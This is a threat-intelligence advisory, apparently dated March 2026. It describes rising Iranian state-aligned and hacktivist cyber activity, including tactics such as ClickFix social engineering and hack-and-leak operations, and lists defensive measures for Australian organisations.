March 2026

Heightened Cyber Activity Following Iran Escalation: What Organisations Need to Know

Recent geopolitical tensions involving Iran have triggered a noticeable shift in the cyber security threat landscape. Intelligence from multiple security communities and national cyber authorities indicates that cyber activity linked to Iranian state-aligned actors and proxy groups is increasing.

While the majority of activity currently appears focused on geopolitical targets in the Middle East and allied nations, the global nature of cyber operations means organisations worldwide- including those in Australia -should remain vigilant. Periods of geopolitical instability have historically been accompanied by spikes in cyber espionage, disruptive attacks, and hacktivist campaigns.

This article explores recent activity, the risks posed to organisations, and practical steps to strengthen cyber resilience.

Escalating Activity Across the Iranian Cyber Ecosystem

Iran maintains one of the most active and diverse cyber ecosystems globally, combining state-sponsored intelligence operations with loosely affiliated hacktivist groups. These actors conduct a mix of espionage, disruption, and influence operations aligned with geopolitical objectives.

Recent intelligence highlights activity across several well-known threat groups, including:

• Charming Kitten (APT35) – Known for spear-phishing campaigns targeting political organisations, researchers, journalists, and government officials.
• APT33 (Elfin) – Often linked to attacks against aviation, energy, and critical infrastructure sectors.
• MuddyWater (Seedworm) – Focused on espionage across government, telecom, defence, and financial sectors.
• OilRig (APT34) – Known for supply-chain attacks and targeted credential harvesting campaigns.
• Pioneer Kitten (UNC757) – Exploits vulnerabilities in VPN infrastructure to establish persistent network access.
• Agrius – A destructive threat actor that deploys wiper malware disguised as ransomware.

Alongside these state-aligned actors, Iranian cyber strategy frequently leverages hacktivist proxy groups to conduct disruptive or deniable operations. Groups such as Cyber Av3ngers, Handala, DieNet, and the Fatimion Cyber Team have conducted activities ranging from website defacements and DDoS attacks to intrusions into industrial control systems and surveillance infrastructure.

These groups often coordinate activity during periods of geopolitical tension to amplify disruption and influence operations.

Emerging Campaigns Demonstrate Evolving Tradecraft

Recent threat intelligence also highlights how Iranian-aligned groups are evolving their operational techniques.

One recent espionage campaign targeted government officials using advanced social engineering combined with custom malware. The operation deployed previously unseen .NET-based malware families designed for stealthy persistence and command-and-control communications.

Several notable tactics stood out:

AI-Assisted Malware Development

Evidence suggests generative AI was used during malware development, enabling attackers to rapidly produce customised payloads and iterate tools more quickly than traditional development cycles.

“ClickFix” Social Engineering

Attackers tricked victims into manually executing malicious PowerShell commands by instructing them to “fix browser errors” or join fake collaboration sessions. This approach bypasses many automated security controls because the victim performs the action themselves.

Stealthy Remote Access Tools

Custom malware included techniques such as hidden Windows forms and delayed communications designed to evade sandbox analysis and automated detection.

These developments demonstrate how threat actors are blending advanced malware with human-centric exploitation techniques to increase success rates.

A Strategic Shift Toward Influence-Driven Disruption

Iranian cyber operations have evolved beyond traditional espionage and defacement campaigns. Security researchers increasingly describe their approach as “influence-driven disruption”

In these campaigns, attackers:

• Steal sensitive data through espionage operations
• Leak the information publicly through social media or dedicated sites
• Use the breach to undermine public trust and create political pressure

This tactic - commonly referred to as “hack-and-leak” operations - combines technical compromise with psychological and reputational impact.

Additionally, Iranian actors are increasingly targeting:

• Industrial control systems (ICS) and operational technology
• Internet-facing infrastructure such as VPNs and firewalls
• Smart devices including cameras and PLCs
• Trusted suppliers and managed service providers

These strategies allow attackers to reach larger numbers of victims through supply chain compromise or infrastructure disruption.

What This Means for Australian Organisations

The Australian Cyber Security Centre (ACSC) has advised that while there is currently no specific evidence of increased targeting of Australia, the evolving geopolitical environment increases the likelihood of opportunistic cyber activity.

Organisations with the following exposure should be particularly alert:

• Operations or supply chains in the Middle East
• Partnerships with international government or defence sectors
• Participation in critical infrastructure ecosystems
• Managed service providers supporting multiple clients
• Organisations with internet-facing infrastructure

Even when attacks are not directly targeted, organisations may still be impacted through:

• Supply chain compromise
• Credential theft campaigns
• Distributed denial of service (DDoS) attacks
• Exploitation of newly disclosed vulnerabilities
• Opportunistic phishing campaigns linked to geopolitical events

Global cyber operations rarely remain contained to a single region.

Key Defensive Measures Organisations Should Prioritise

Given the tactics commonly used by Iranian-aligned actors, organisations should consider strengthening several core defensive controls.

Strengthen Identity Security

Many campaigns rely on credential theft or password spraying.

Recommended measures include:

• Enforcing multi-factor authentication (MFA) across all services
• Monitoring for unusual login patterns
• Implementing conditional access policies

Harden Internet-Facing Infrastructure

Iranian groups frequently exploit known vulnerabilities in edge devices.

Organisations should:

• Prioritise patching of VPN, firewall, and gateway vulnerabilities
• Ensure critical systems are not exposed directly to the internet
• Conduct regular vulnerability scanning and configuration reviews

Improve Phishing and Social Engineering Defences

Modern campaigns increasingly target collaboration platforms such as:

• Microsoft Teams
• LinkedIn
• WhatsApp
• Email

Security awareness training should extend beyond email phishing to include multi-channel social engineering.

Secure Operational Technology and IoT

Industrial systems and smart devices can provide attackers with both operational access and intelligence gathering capabilities.

Best practices include:

• Removing default credentials
• Segmenting OT networks
• Restricting remote access to ICS devices

Prepare for Disruptive Activity

Hacktivist groups often launch nuisance or disruptive campaigns during geopolitical crises.

Organisations should:

• Validate DDoS mitigation procedures
• Test backup and recovery processes
• Review incident response playbooks

Cybersecurity in a Geopolitical Era

Cyber operations have become a central component of modern geopolitical competition. Nation-state actors increasingly blend espionage, disruption, and influence campaigns to achieve strategic objectives without direct military engagement.

For organisations, this means cyber risk can escalate rapidly in response to international events.

While not every organisation will be directly targeted, any organisation connected to global digital infrastructure can become part of the attack surface.

The most resilient organisations focus on three principles:

• Visibility across networks, identities, and cloud environments
• Rapid detection of abnormal behaviour
• Prepared response capabilities

In an environment where cyber threats increasingly mirror geopolitical tensions, preparedness and resilience are essential.